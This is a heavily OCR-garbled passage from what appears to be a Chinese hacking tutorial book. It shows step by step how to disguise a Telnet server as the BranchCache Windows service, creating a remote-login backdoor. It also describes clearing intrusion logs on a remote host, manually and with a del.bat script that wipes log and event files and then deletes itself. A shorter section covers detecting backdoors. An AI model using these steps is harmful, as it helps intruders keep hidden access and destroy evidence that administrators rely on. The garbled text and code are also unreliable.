下 载 Srvinstw 后 将 其 解压 到 本 地 计算 机 中 ,， 双击” 国 选择 " 移 除 服务 " 单 击 “ 下 一 步 ” 
SRVINSTW.EXE 快 捷 图 标 。 单 选 按钮 。 按钮 。 
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Ed 

新 蛙 
新 全 人 人 他 
STEP03: 选择 本 地 计算 





他 安装/ 移 除 服务 (汉化 WinG). 


客 ET 





入 门 到 精通 


请 选择 将 要 执行 的 计算 机 类 型 


下 远程 机 器 
计算 机 名 : 








= 








; @| [Fm 


国 选择 “本 地 机 器 * 
单 选 按钮 。 


国 半 击 下- 步 
按钮 。 


STEP04: 选择 要 删除 的 服务 


克 安装 / 移 除 服务 (汉化 WinG). 





请 选择 将 要 删除 的 服务 名 字 . 





选择 要 删除 的 服务 


STEP06: 服务 成 功 移 除 


侈 | 安装 / 移 除 服 务 [汉化 WinG). 


提示 用 户 服务 成 功 移 除 , 单 击 
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国 单 击 “下 一 
步 ”按钮 。 





“确定 ”按钮 。 








选择 远程 计算 机 需 满足 指定 条 件 

在 STEP03 中 ,如 果 黑 客 无 法 
通过 图 形 界面 控制 目标 计算 机 , 但 
已 建立 具有 管理 员 权 限 的 IPC$ 连 
接 ， 则 可 以 选择 远程 机 器 





STEP05: 单 击 “完成 ”按钮 


约 ; 安装 / 移 除 服务 (汉化 WinG). Em| 
服务 移 除 向 导 准 备 好 移 除 服务 . 


服务 : BranchCache 





点 击 完 成 执行 操作 . 


< 上 - 步 oj| 完成 人 | 取消 | 
确认 所 选 的 服务 无 误 后 , 单 击 “ 完 成 ”按钮 。 


STEP07: 再 次 启动 Srvinstw 程序 











双击 SRVINSTW.EXE 快 捷 图 标 


1 





后 门 技 术 


STEP08: 选择 安装 服务 STEP09: 选择 执行 的 计算 机 类 型 








郊 安装/ 移 除 服务 (汉化 WinG). | 「 筑 安 半 / 移 除 服务 (汉化 WinG). 


欢迎 使 用 本 软件 . 请 选择 将 要 执行 的 计算 机 类 型 


个 移 除 服务 





请 按 下 一 步 继 昧 








RE 
选择 “安装 服务 ” 单 击 “ 下 一 步 ” 国 选择 “本 地 机 器 单 击 “ 下 一 步 ， 
单 选 按钮 。 按钮 。 单 选 按钮 。 按钮 。 
STEP10: 输入 服务 器 名 称 STEP11: 单 击 “ 浏 览 ”按钮 








元 安装 / 移 除 服务 (汉化 WinG)， 蕊 号 
请 输入 服务 名 称 . 注意 区 分 大 小 写 及 字符 正确 性 . 


三 移动 艾 件 到 system32 目 巴 














消 取消 | 
输入 服务 名 称 。 国 单 击 “下 一 步 "按钮 。 单 击 "浏览 ”按钮 。 
STEP12: 选择 tlntsvr 文件 STEP13: 确认 所 选择 的 程序 











她 安装 / 称 除 服务 (汉化 WinG). ,Zl 
请 输入 程序 路 径 . 此 路 径 必须 是 本 地 计算 机 真实 路 径 . 


[ ‘Windows\Svstem32\tlntsv. exe 


名 称 浏览 ... 


E31 timeout.exe 
[a3 tIntad mn.exe 


一 一 一 tlntsess.exe 














we 
文件 名 (N): tlntsvr.e [sevices 7 
- 
园 在 地 址 栏 中 选中 tintsvr.exe ”确认 所 选择 的 程序 路 径 无 误 后 , 单 击 " 下 一 步 按钮 。 
统 分 区 中 ee 到 单 击 “打开 ” 
文件 夹 。 按钮 。 


2 1 





EA 


取 ED re D> 
新 
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STEP14: 选择 安装 的 服务 种 类 STEP15: 设置 服务 的 运行 权限 


泡 ) 安装 / 移 除 服务 (汉化 WinG). 好) 安装 / 称 除 服务 (汉化 WinG). 
请 选择 您 要 安装 的 种 类 . 设 定 服务 运行 权限 . 


5 猴 件 服务 只 用 其 自身 进程 ji 他 东 统 项 司 


者 的 








[en 
选择 安装 的 服务 种 单 击 “ 下 一 步 ” 图 设置 服务 的 运行 权限 单 击 “ 下 一 步 ” 
类 为 “软件 服务 ”。 ee 为 “系统 项 目 ”。 按钮 。 
STEP16: ”选择 服务 的 启动 类 型 STEP17: 确认 所 添加 的 服务 


她 ) 安装 / 移 除 服务 (汉化 WinG). 
服务 安装 向 导 准 备 好 安装 服务 . 


爷 安 法 / 移 除 服 务 (汉化 WinG)， 区 村 


动 类 型 “| 导 “ 和 "系统 "选项 只 能 由 文件 
el 


服务 : BranchCache 





辆 选择 服务 启动 类 型 国 单 击 “下 一 步 ” 确认 所 添加 的 服务 名 称 , 无 误 后 , 单 击 "完成 " 按钮 。 
为 “自动 ”。 按钮 。 
STEP18: 服务 安装 成 功 STEP19: 添加 服务 描述 信息 


绚 ) 安装 / 移 除 服务 (汉化 WinG). 管理 员 : C:\Windows\system32\cmd.exe 


Microsoft Windows [hR 本 6.1.?680] 
(nik ea = ce» 2009 Microsoft Corporat1ion 。 保留 上 所有权 逢 。 


En 


CG:\Users\v ohn2sc descrintion PeerDistsuc 此 服务 比 行 来 
自 本 地 子 网 上 对 等 万 的 网 络 内 容 。 


[SG] GhangeSserviceGConf ig2 成 功 


,HE [E73 





提示 用 户 服务 安装 成 功 , 单 击 “确定 ”按钮 。 输入 “sc description + 服务 名 称 + 服 务 描述 信息 
后 按 《Enter> 键 ， 为 该 服务 添加 描述 信息 。 
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后 门 技术 


注意 区 分 windows 系统 服务 的 服务 名 称 和 显示 名 称 
在 Windows 系统 中 ， 系 统 服务 通常 有 两 个 名 称 ， 即 服务 名 称 和 显示 名 称 ， 


“服务 ”窗口 中 显示 的 名 称 为 显示 名 称 ， 者 要 查看 其 服务 名 称 ， 需 要 在 “服务 ” 
窗口 中 双击 对 应 的 服务 选项 ， 在 弹出 对 话 框 的 “常规 ”选项 卡 下 可 看 见 该 服务 
的 服务 名 称 ， 同 时 也 可 看 见 其 显示 名 称 。 





STEP20: 双击 BranchCache 服务 选项 STEP21: 查看 可 执行 文件 路 径 和 描述 


| 服务 | BranchCache 的 历 性 (本 地 计算 机 ) 
文件 (F) ”操作 (A) ”查看 (V) ”帮助 (H) 常 坝 ”| 五 录 [恢复 [ 依 存 关系 | 
名 本 国 | 国外 己 | 上 日 画 | PP 铺 服务 名 称 : PT 
襄 服 务 (本 地 ) 名 称 
5 BitLocker Drive Encryption Service 描述 : 此 服务 绿 存 来 自 本 地 子 网 上 对 等 方 的 网络 内 容 。 


| ° 











下 


Ss Block Level Backup Engine Service 可 执行 文件 的 路 径 : 
Sk Bluetooth Support Service C:\Windows\System32\tlntisvr, exe 


BranchCache 启动 类 型 企 ): 
SE Certificate Propagation ; 
CNG Key Isolation 
su COM+ Event System 服务 状态 : 

ON Sac Appilicalion 下) WT 年 信人 














双击 “BranchCache” 服务 选项 。 可 查看 该 服务 的 描述 信息 和 可 执行 文件 路 径 ， 只 要 
该 服务 运行 ， 黑 客 就 能 远程 登录 该 计算 机 。 


11.4 检测 系统 中 的 后 门 程序 


后 门 是 在 黑客 已 成 功 入 侵 日 标 计算 机 之 后 在 其 系统 中 创建 的 。 因 此 ， 用 户 大 要 检测 系 
统 中 是 人 否 存在 后 门 系统 ， 则 需要 检测 系统 中 的 进程 、 系 统 的 局 动 信 息 以 及 系统 开放 的 器 口 
信息 

1. 简单 手工 检测 法 

凡是 后 门 ， 必 然 需要 隐蔽 的 城 喘 之 所 ， 要 找到 这 些 程序 ， 那 驶 需要 仔细 和 奏 找 系统 中 每 
个 可 疑 之 处 ， 如 目 局 动 项 。 据 不 完全 统计 ， 目 局 动 项 目 有 近 80 多 种 。 

用 AutoRuns 检 和 谷 系 统 司 动 项 , 通过 观察 可 疑 局 动 程序 路 径 谷 找 可 颖 局 动 服务 ， 如 一 些 
种 见 系 统 路 径 一 般 在 System32 下 ， 如 果 在 系统 目录 System32 下 发 现 notepad、System、 
smss.exe、csrss.exXe、winlogon.exe、services.exe、1]sass.exe、Sspoolsv.exe 这 类 进程 中 的 两 个 ， 
那 计算 机 很 可 能 已 经 中 毒 了 。 

如 采 是 网 页 后 门 程序 ， 一 般 检 得 最 近 补 修改 过 的 文件 ， 当 然 ， 目 前 一 些 高 级 webshell 
后 门 已 经 文 持 更 改 自身 创建 /修改 时 间 来 迷惑 管理 员 了 。 

2. 拥有 有 反 向 连接 的 后 门 检测 

这 类 后 门 一 般 会 监 昕 茶 个 指定 端口 ， 要 检查 这 类 后 门 ， 需 要 用 到 DOS 命令 。 在 没有 打 
开 任 何 网 络 连接 页 面 和 防火 墙 的 情况 下 输入 “netstat -an” 监 听 本 地 开放 端口 ， 看 是 否 有 本 
地 IP 连接 外 网 IP。 
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3. 无 连接 的 系统 后 门 

如 shift、 放 大 镜 、 屏 保 后 门 ， 这 类 后 门 一 般 都 修改 了 系统 文件 ， 所 以 检测 这 类 后 门 的 
方法 束 是 对 照 它们 的 MD5 值 ,如 sethc.exe (shift 后 门 ) 用 加 密 工 具 检 测 的 正常 数值 是 MD5: 
f09365c4d87098a209bd10d92e7a2bed， 如 果 数 值 不 等 于 这 个 ， 就 说 明 MD5 值 被 算 改 过 。 

4. CA 后 门 

CA 元 隆 账 号 这 样 的 后 门 建 并 以 $ 为 后 级 的 超级 管理 员 ， 在 DOS 下 无 法 查看 该 用 户 ， 
用 户 组 管理 也 不 显示 该 用 户 ， 手 工 检 查 一 般 是 在 sam 里 删除 该 账号 键 值 。 当 然 要 小 心 ， 如 
果 没 有 经 验 ， 建 议 还 是 用 工具 。 当 然 ，CA 有 可 能 克隆 的 是 guest 用 户 ， 所 以 在 服务 器 上 最 
好 为 guest 用 户 设 置 一 个 复杂 密码 。 

5S. ICMP 后 门 

ICMP 后 门 比较 罕见 ， 如 果真 要 预防 此 后 门 ， 只 有 在 默认 Windows 防火 场 中 设置 只 人 允 
许 ICMP 传 入 的 回 显 请 求 。 

6. RootKit 后 门 

RootKit 后 门 隐 基 得 比较 次 ， 它 的 历史 也 菲 党 长 ，1989 年 友 现 首 例 在 UNIX 上 可 以 过 
滤 目 己 的 进程 被 ps -aux 命令 查看 的 RootKit 秩 形 。 此 后 , 这 类 高 级 隐 羧 工具 不 断 发 展 完整 ， 
并 在 1994 年 成 功 运 用 到 高 级 后 门 上 并 开始 流行 ,此 后 一 直 保 持 看 后 门 的 领先 地 位 ， 了 最 新 出 
现 的 Boot Root 也 是 该 后 门 ， 的 一 个 高 级 变种 。 为 了 抵御 相应 的 高 级 后 门 ， 国 外 也 相继 出 现 
了 相应 的 得 杂工 具 。 例 如 ， 衍 兰 的 反 RoofKit 的 工具 Gmer、Rootkit Unhooker 和 RKU 都 可 
以 检测 并 清除 RootKit 及 其 变种 。 


半 河 [ 
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入 侵 狠 迹 清 除 技术 


一 旦 入 侵 者 与 远程 主机 /服务 器 建立 起 连接 , 系统 就 开始 把 入 侵 者 的 卫 地址 
及 相应 操作 事件 记录 下 来 ， 此 时 系统 管理 员 就 可 以 通过 这 些 日 志文 件 找到 入 侵 
者 的 入 侵 痕 迹 ， 从 而 获得 入 侵 证 据 及 入 侵 者 的 IP 地址 。 所 以 ， 为 避免 留 下 入 侵 
的 痕迹 ， 黑 客 在 完成 入 侵 任 务 之 后 ， 还 会 尽 可 能 地 把 自己 的 入 侵 日 志清 除 干 净 ， 
以 免 被 管理 员 发 现 。 


日 志 产 生 的 原 
OO 清除 服务 器 日 去 
O Windows 日 志清 理工 具 elsave 和 ClearLogs 


〇 清除 历史 痕迹 





> 
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12.1 黑客 留 下 的 脚印 


日 忘 就 是 对 系统 中 的 操作 进行 记录 ， 通 过 查看 日 志 可 以 了 解 计算 机 操作 和 应 用 程序 的 
运行 情况 ， 黑 客 入 侵 后 的 所 有 行动 也 会 被 日 忘记 录 下 来 。 











12.1.1 日 志 产 生 的 原 


日 志 是 Windows 系统 中 比较 特殊 的 文件 , 它 记录 看 Windows 系统 中 所 发 生 的 一 切 ， 例 
如 各 种 系统 服务 的 启动 、 运 行 、 关 闭 等 信息 。 日 志文 件 通 常 有 应 用 程序 日 志 、 安 全 日 志 、 
系统 日 志 、DNS 服务 器 日 志和 FTP 日 志 等 。 

1. 使 用 “事件 查看 器 ”查看 各 种 日 志 

利用 Windows 系统 中 的 事件 查看 器 ， 可 以 但 看 系统 存在 的 安全 问题 以 及 已 经 植 入 系统 
的 “ 则 谍 软 件 ” 选择 “开始 ”一 “控制 面板 ”这 单 命令 ， 打开 “控制 面板 ”窗口 。 依 次 竺 
击 “ 系 统 和 安全 ”和 “管理 工具 ”选项 ， 在 “管理 工具 ”窗口 中 双击 “事件 查看 器 ”选项 ， 
即 可 打开 “事件 查看 器 ”窗口 ， 如 下 图 所 示 。 可 以 看 出 事件 的 类 型 有 : 错误 、 和 警告 、 信 息 、 
审核 成 功 、 审 核 失 败 等 。 


事件 查看 器 。 
文件 (了 ”操作 (A) ”查看 (V) ”帮助 (H) 
包 中 | 国 | 日 





















































国 事件 查看 器 (本 地 ) | 

夸 自 定 义 视图 

蕊 Windows 日 志 
妃 应 用 程序 和 服务 日 志 
加 订 赚 
























































日 志 摘要 
日 志 名 称 大 小 (当前 ..。 修改 时 间 已 启用 保 器 策略 
应 用 程序 00 2014/9/1 启用 根据 需要 要 差事 件 ( 先 要 
硬件 事件 68 KB/ 2011/5/2 启用 根据 亏 要 要 盖 事 件 ( 先 村 
et / /5 启用 根据 需要 要 差事 件 ( 先 要 
M 68 KB/ /5/ 启用 根据 需要 要 苦 事 件 ( 先 要 





























“事件 查看 器 ”窗口 


利用 事件 碍 看 堪 可 以 得 看 “应 用 程序 ”“ 安 全 性 ”和 “系统 ”这 三 个 方面 的 日 志 。 每 一 
种 日 六 的 作用 如 下 所 述 。 

@ 应 用 程序 日 志 。 应 用 程序 日 忘 包含 由 应 用 程序 或 系统 程序 记录 的 事件 。 例 如 ， 数 据 
库 程序 可 在 应 用 日 志 中 记录 文件 错误 。 程序 开 发 员 决 定 记 录 什 么 事件 。 应 用 程序 日 
志文 件 的 默认 存放 位 置 是 C:\Windows\System32\winevt\Logs\Application.evtx， 如 下 
左 图 所 示 。 

@ 系统 日 恋 。 系 统 日 忘 包含 Windows 的 系统 组 件 记录 的 事件 。 如 ， 在 局 动 过 程 将 加 
载 的 驱动 程序 或 其 他 系统 组 件 的 失败 记录 在 系统 日 志 中 。Windows 预先 确定 由 系统 
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入 侵 痕 还 清除 技术 


组 件 记 录 的 事件 类 型 。 系 统 日 志文 件 的 默认 存放 位 置 是 C:\Windows\System32\ 
winevt\ Logs\System.evtx， 如 下 右 图 所 示 。 














文件 (有 ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
组 织 ~ 团 打开 ~ 新 建文 件 夫 








OAlerts.evtx Security.evtx Setup.evtx 


Spybot - Search System.evtx Windows 
d PowerShell.evix 




















an 
- Destroy.evtx 











Application.evtx 修改 日 期 : 2014/9/11 8:54 创建 日 期 : 2011/5/26 10:12 到 | 。 System.evtx 修改 日 期 : 2014/9/11 8:54 创建 日 期 : 2011/5/26 10:12 
事件 日 志 大 小 : 20.0 MB 事件 日 志 大 小 : 20.0 MB 


应 用 程序 日 志 系统 日 志 


@ 安全 日 志 。 安全 日 志 可 以 记录 安全 事件 ， 若 有 效 的 和 励 浆 的 避 录 宕 斌 ， 以 及 与 创建 、 
打开 或 删除 文件 等 资源 使 用 相关 联 的 事件 。 管 理 占 可 以 指定 在 安全 日 志 中 记录 什么 事件 。 
例如 ， 如 采 已 司 用 登录 审核 ， 登 录 系 统 的 符 试 将 记录 在 安全 日 志 里 。 安 全 日 忘 文件 默认 位 
置 是 C:\Windows\ System32\winevt\Logs\Security.evtx， 如 下 图 所 示 。 





























文件 ( 纺 且 昌 、 查看 (V) TAM 帮助 (H) 
组 织 了 国 打 开 ~ 新 建文 件 夫 


Microsoft-Wind “ Microsoft-Wind Microsoft-Wind 

ows-Wired-Aut ows-WLAN-Aut ows-WPD-Class 

oConfig%AOpe oConfig%A4Ope Installer%A4Ope 
rational.evtx rational.evtx rational.evtx 


,| 


Microsoft-Wind OAlerts.evtx Security.evtx 
Eu ES A 








Security.evtx 修改 日 期 : 201479711 8: 54 创建 日 期 : 2011/5/26 10:12 
吉 件 日 志 大 小 : 20.0 MB 








安全 日 志 
得 看 日 志 是 每 一 个 管理 员 必 须 做 的 日 营 事 务 。 通 过 得 看 日 和 六， 管理 员 不 仅 能 够 得 知 当 
前 系统 的 运行 状况 、 健 康 状态 ， 而 且 能 够 通过 登录 成 功 或 失败 审核 来 判断 是 否 有 入 侵 者 答 
试 登录 该 计算 机 ， 其 全 可 以 从 这 些 日 忘 中 找 出 入 侵 者 的 IP 地 址 。 因 此 ， 事 件 日 志 是 管理 员 
和 入 侵 者 部 十 分 敏感 的 部 分 。 入 侵 者 忌 古 要 想方设法 清除 挥 这 些 日 志 。 


程序 语言 学 习 顺 序 建 议 
如 果 不 确定 日 志 存 储 位 置 ， 打 开 “ 事 件 查 看 器 ”窗口 ， 在 左 侧 窗 格 中 依次 
单 击 “Windows 日 志 ” 一 “应 用 程序 ?"”， 在 右 侧 “操作 ” 窗 格 中 单 击 “ 属 性 ” 














可 弹出 “日 志 属 性 -应 用 程序 (类 型 : 管理 的 )” 对话 框 ， 如 下 图 所 示 。 在 该 对 
话 框 中 可 查看 日 志 路 径 及 应 用 程序 日 志 名 称 。 系 统 日 志和 和 安全 日 志 路 径 查 看 方 
关羽， 
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| 日 志 屋 性 - 应 用 程序 (类 型 : 管理 的 ) 








Application 


20.00 MB(20,975,616 个 字 节 ) 

创建 时 间 2011 年 5 月 26 日 10:12:56 
修改 时 间 : 2014 年 9 月 11 日 8:54:43 
访问 时 间 : 2011 年 5 月 26 日 10:12:56 

启用 日 志 记 录 (E) 
日 志 最 大 大 小 ( KB }00: 
达到 事件 日 志 最 六 大 小 时 : 

矶 |) 按 权 要 要 羡 训 件 (旧地 件 优先 }0WW) 

外 日 志 漠 时 将 其 存档 ,不 要 芋 事 件 (A) 

名 不 槛 苦于 件 (手动 清除 日 志 )(N) 

















清除 日 志 外 ) 

















2. 在 注册 表 里 的 查看 日 志 

计算 机 中 的 各 种 日 志 在 “ 注 册 表 编辑 费 ” 和 窗口 中 也 可 以 找到 对 应 的 键 值 。 下 面 将 介绍 
如 何在 注册 表 中 和 奉 看 各 种 日 志 信 息 。 

1) 应 用 程序 上 日志、 安全 上 日志、 系统 日 志 、DNS 服务 器 等 日 志 的 文件 在 注册 表 中 的 键 
为 : HKEY LOCAL MACHINEASYSTEMNACurrentControlSetservices\eventlog， 其 中 有 很 多 
子 表 中 可 但 看 到 以 上 日 志 的 定位 目录 ， 如 下 左 图 所 示 。 

2) Schedluler 服务 日 志 在 注册 表 中 的 键 为 : HKEY LOCAL MACHINE\SOFTWARRE' 
Microsoft\SchedulingAgent。. 










































































r 一 | 站 | 
耻 注册 志 编 加 器 a EE 职 注册 志 编 加 器 ee (ols 
文件 (站 ”编辑 (E) 查看 (V) 收藏 夫 (A) 帮助 (H) 文件 (月 ”编辑 (E) 查看 (V) 收藏 夫 (A) 帮助 (H) 
加 rnl ^ || 名称 类 型 数据 Reliability Analysis ^|| 名 称 类 型 数据 
站 E1G60 Lab] (了 REG_SZ (数值 未 设置 ) RemovalTools 28]( 默 认 ) REG SZ (数值 未 设置) 
出 Eaphost ab|Description REG_SZ @%6SystemRoot96\system32\wevtsvc.dll-201 P 国 RendezvousApps 本 Logpath REG_EXPAND_SZ 。 %SystemRoot96\Tasks\SCHEDLGU.TXT 
WB ebdrv adlDisplayName REG_SZ @%6SystemRoot9t\system32NWwevtsvc.dll-200 县 RFC1156Ag 多 MaxLogsizekB ”REG_DWORD 0x00000020 (32) 
胃 EM 顺 ErrorControl 。 REG_DWORD 0x00000001 (1) 且 Router ad]OldName REG_SZ 37L4247D28-05 
- Ce 名 FailureActions ”REG_BINARY 80 51 01 00 00 00 00 00 00 00 00 00 03 00 00.. one ab| TasksFolder REG EXPAND SZ  %SystemRoot\Tasks 
Bchsched 纲 FailureActions..。 REG_DWORD 0x00000001 (了 ) 加 ee ey 
由 elxsto | | Greup Log » -Search Enh nt Pack 
加 ErDev abjImagepath REG_EXPAND_SZ  %SystemRooté\System32\svchost.exe -k Loc... 加 Security C 
轩 ESENT a ObjectName REG_SZ NT AUTHORITY\LocalService 加 Sa 
2 而 eventiog| %s|PplugPlayServic... REG_DWORD Ox00000003 (3) 昌 ServerManager 
四 7] Application ab| RequiredPrivile... REG MULTI SZ SeChangeNotifyprivilege SelmpersonatePrivil... 》 国 shared 
加 HandwweEves ab| ServiceDI| REG EXPAND SZ 。” %SystemRoot96\System32\wevtsvc.dll 加 Shared Tools 
国 Internet Explorer ServiceDIlUnlo... REG_DWORD 0x00000001 (1) DD Shared Tools Location 
BE Key Management Service ab]ServiceMain REG_SZ ServiceMain bp- 出 SideShow 
出 Media Center ServiceSidType REG DWORD Ox00000001 (1) 加 Silverlight [9 
国 OAlerts 岗 Start REG_DWORD 0x00000002 (2) snippingTool | | 
Security 加 Type REG_DWORD 0x00000020 (32) 加 softGrid 本 
有 FDRespub 了 | 川 唤 国 TelnetServer 
计算 机 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\eventlog 计算 机 \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent 
E eo J | 























在 注册 表 中 查看 各 种 日 志 查看 Schedluler 服务 日 志 


3. FTP 日 志 

FTP 日 志和 IIS 日 志 在 上 默认 情况 下 每 天 生成 一 个 日 志文 件 ， 包 括 当 天 的 所 有 记录 。 文 
件 名 通 弟 为 ex 年 份 ) (月 份 ) (日 期 )， 从 日 志 里 能 看 出 黑客 入 侵 时 间 、 使 用 的 IP 地 址 以 
及 探测 时 使 用 的 用 户 名 ， 这样 使 得 管理 员 可 以 想 出 相应 的 对 策 。FTP 日 恋 的 默认 存放 位 置 
C:\Windows\System32\config\msftpsvcel\。 
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4. IIS 日 志 

IIS 日 志 是 每 个 服务 右 管 理 者 都 必须 学 会 但 看 的 ， 服 务 右 的 一 些 状况 和 访问 IP 的 来 源 
都 会 记录 在 JS 日 志 中 ， 所 以 IS 日 忘 对 服务 占 省 理 者 非常 地 重要 ， 同 时 也 可 方便 网 站 省 理 
人 员 查 看 网 站 有 的 运 宫 情况 。ITS 日 志 的 默认 存放 位 置 : C:\Windows\System32\LogFiles\w3svcl\。 

5. Schedluler 服务 日 志 

利用 Schedluler 服务 ， 可 以 将 任何 脚本 、 程 序 或 文档 安排 在 某 个 最 方便 的 时 间 运 行 。 

Scheduler 服务 日 志 的 默认 存放 位 置 : C:\Windows\schedlgu.tx。 























12.1.2 为 什么 要 清理 日 志 


Windows 网 络 操作 系统 中 包含 各 种 各 样 的 日 志文 件 ， 例 如 应 用 程序 日 入、 安全 日 志 、 系 统 
日 志 、Scheduler 服务 日 志 、FTP 日 志 、WWW 日 志 、DNS 服务 器 日 志 等 ， 其 扩展 名 为 log.txt。 
这 些 日 志 由 于 开局 不 同 的 系统 服务 而 有 所 不 同 。 当 在 系统 上 进行 一 些 操 作 时 ， 这 些 日 志文 件 通 
常会 记录 下 用 户 操 作 的 一 些 相关 内 容 ， 这 些 内 容 对 系统 安全 工作 人 员 相 当 有 用 。 比 如 对 系统 进 
行 了 IPC 探测 , 系统 束 会 在 安全 日 志 里 迅速 地 记 下 探测 时 所 用 的 他 地址 、 时 间 、 用户 名 等 信息 ; 
而 用 FTP 探测 ， 则 会 在 FTP 日 志 中 记 下 卫 地址、 时 间 、 探 测 所 用 的 用 户 名 等 信息 。 

黑客 们 在 获得 管理 员 权限 后 就 可 以 随意 破坏 计算 机 上 的 文件 ， 包 括 日 忘 文件 ， 但 是 其 
操作 就 会 被 系统 日 六 所 记录 下 来 ， 所 以 黑客 要 想 隐藏 目 己 的 入 侵 踩 迹 ， 束 必须 对 日 忘 进行 
修改 。 黑 客 一 般 采 用 修改 日 六 的 方法 来 防 目 系统 管理 员 发 现 目 己 的 踩 迹 ， 有 很 多 具备 此 关 
功能 的 程序 ， 例 如 Zap、Wipe 等 。 

日 志文 件 是 微软 Windows 系列 操作 系统 中 的 一 个 特殊 文件 ， 在 安全 方面 起 看 不 可 百代 
的 作用 。 它 记录 看 系统 的 一 举 一 动 ， 利 用 日 志文 件 可 以 使 网 络 省 理 员 快速 对 潜在 的 系统 入 
侵 进 行 记录 和 了 预测。 所以， 为 了 防止 官 理 员 友 现 计算 机 被 黑 客 入 侵 后 通过 日 志文 件 合 到 入 
侵 的 踪迹， 黑客 一 般 都 会 在 断 开 与 入 侵 主 机 的 连接 前 删除 入 侵 时 产生 的 日 忘 。 

对 于 网 上 求助 这 种 远程 的 判断 和 分 析 ， 必 须 借助 第 三 方 的 软件 分 析 日 志文 件 的 内 容 , 分 析出 
用 户 系 统 的 大 部 分 故障 及 正 浏览 器 被动 持 、 恶 意 插 件 、 流 谍 软 件 以 及 部 分 的 木马 病毒 等 。 


















































12.2 清除 服务 器 日 志 
删除 服务 器 日 志 第 用 的 方法 有 手工 删除 和 通过 批 处 理 文 件 删除 两 种 方式 。 





12.2.1 手工 删除 服务 器 日 志 


在 入 侵 过 程 中 ， 远 程 主机 的 Windows 系统 会 对 入 侵 者 的 登录 、 注 销 、 连 接 ， 其 至 复制 文件 
等 操作 进行 记录 ， 并 把 这 些 记录 保留 在 日 志 中 。 在 日 志文 件 中 记录 着 入 侵 者 登录 时 所 有 的 账号 
以 及 入 侵 者 的 耻 地 址 等 信息 。 入 侵 者 通过 多 种 途径 来 擦 除 留 下 的 浪迹 ,往往 是 在 远程 个 控 主 机 
的 “控制 面板 ”窗口 中 打开 事件 记录 和 窗口， 在 其 中 对 服务 器 日 记 进 行 手工 清除 。 

具体 的 操作 步骤 曝光 如 下 。 
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黑客 


售 人 他 他 


IPC$ 成 功 连接 


EE 当 
取 
靳 





STEPO1: 


个 唉 ， 控制 面板 瘦 索 控制 面板 


调整 计算 机 的 设置 查看 方式 ， 类 别 ~ 


用 户 帐 户 和 家 


-证 间 看 并 更 改 系统 和 安全 状态 ， 备份 并 
| 还 原文 件 和 系统 设置 ,更 新 计算 机 ， 
音 看 RAM 和 处 理 器 污 度 和 检查 防火 


全 2 
在 远程 主机 的 “控制 面板 ”窗口 中 单 击 “ 系统 和 安 
全 ”选项 。 
STEP03: 查看 各 种 工具 


修改 日 期 
2014/11/4 * 
2014/11/4 * 





2014/11/4 * 
2014/11/4 * 





2014/11/4 : 
2014/11/4 : 
2014/11/4 
2014/11/4 " 
2014/11/4 " 
2014/11/4 : 
2014/11/4 “vy 

号 图 莹 杂 坛 (F) v < 
18 个 项 目 


双击 “计算 机 管理 ”选项 。 


STEP05: 查看 事件 类 型 














修改 引 癌 
7.07 MB/-， 2015/2/4 9:37:39 用 
68 KB/20.. 2014/12/31 9:53209 局 用 
ge we anss na Mssan ~ 

















在 “管理 事件 的 摘要 ” 窗 格 中 6 类 事件 。 
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攻防 从 入 门 到 精通 


STEP02: 打开 “系统 和 安全 ”窗口 


(© 要 个 Ee 上 控制 ,， 上 系统 ,.， 上 对 心 搜索 控制 面板 


控制 面板 主页 于 存储 空间 


管理 存储 空 间 
甩 工 作文 件 严 
同 乍 文 件 夹 


管理 工作 文件 去 


系统 和 安全 

网 络 Internet 
硬件 和 疡 音 l | 
程序 向 Windows Technical 


4 Preview 添加 功能 


户 帐户 和 家 庭 
本 确 汞 取 新 版 Windows 的 更 多 功能 


外 观 和 个 性 化 
对 铀 、 语 言 和 区 域 J 
、。 一 | 配置 你 计算 机 的 管理 设置 . 
哮 创建 并 局 

哮 音 看 吉 件 日 志 | 里 计划 任务 


Flash player 
单 击 “管理 工具 ”选项 。 











STEP04: 打开 “计算 机 管理 ”窗口 


文件 (中 ”操作 (A) ”前 春 (V) ”帮助 (H) 


外 中 | 自 国 | 日 国 








若 要 坦 看 已 在 计算 机 上 出 现 的 事件 ， 
点 。 管 理 吉 件 自 定义 试图 包括 所 有 管 








展开 “计算 机 管理 ( 本 地 ) ” >“ 系统 工具 ”> “事件 
查看 器 ”选项 。 


STEP06: ”查看 事件 实例 


若 要 音 看 已 在 计算 机 上 出 现 的 事件 ， 请 在 皖 制 台 树 中 选择 相应 的 来 ; 
点 。 管 理事 件 自 定 义 试图 包括 所 有 管理 事件 ， 而 与 来 源 无 关 。 以 下 | 





右 击 具 体 事件 后 选择 “查看 此 事件 的 所 有 实例 " 命令 。 
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STEP07: 查看 事件 具体 信息 STEP08: 删除 事件 


3 网 F0 时 间 
2015/2/10 9:02:32 


2015/2/10 9:;01:30 
2015/2/10 9:;00:57 
2015/2/10 9:00:44 
2015/2/9 552405 
2015/2/7 2:5158 


2015/2/6 16:03:22 
2015/2/6 16;03;09 
2015/2/6 14:00:09 





2015/2/6 859:35 
06 Security-Spp 
事件 16 ,WindowsJpcateClient 
书 规 。 详细 信息 











| Windows 无 法 连 按 到 旺 动 更 新 统 务 ， 因 比 不 训 按 照 设 置 鸭 计划 下 载 并 安 美 更 








日 记名 称 (M): ES 
来 源 (S): WindowsUpdateClient 记录 时 间 (D) ”2015/2/10 5:02:32 














寺 直 机 /RY 














查看 该 事件 出 现 的 次 数 以 及 相关 信息 。 国 单 击 "出 单 击 “ 是 ”按钮 即 删除 此 事件 。 


除 ”选项 


12.2.2 ”使 用 批 处 理 清除 远程 主机 日 志 
一 般 情况 下 ， 在 Windows 系统 中 ， 日 志文 件 的 扩展 名 为 “.log” 或 “.txt”， 这 样 就 可 以 





编写 一 个 批 处 理 文件 来 实现 对 日 志文 件 的 清除 。 


具体 的 实现 步骤 曝光 如 下 。 
1) 编写 一 个 批 处 理 文件 del.bat 如 下 。 


@del Cwinntsystem321l0g9f1iLes*, * 
ae cwinntsystem32config*,evt 
@del ciwinntsystem32dtclog*,* 
Qdel c:winntsystem32* .1odg 

人 口外 | cmwinntaeyestem32* ,txt 

dal cwinnt*., txt 

Qdel c:winntr* .1og 

Qdel c:del.bat 


在 上 面 的 代码 中 ， echo 是 DOS 下 的 回 显 命令 ， 在 它 的 前 面 加 上 “@™ 前 


ty 访 


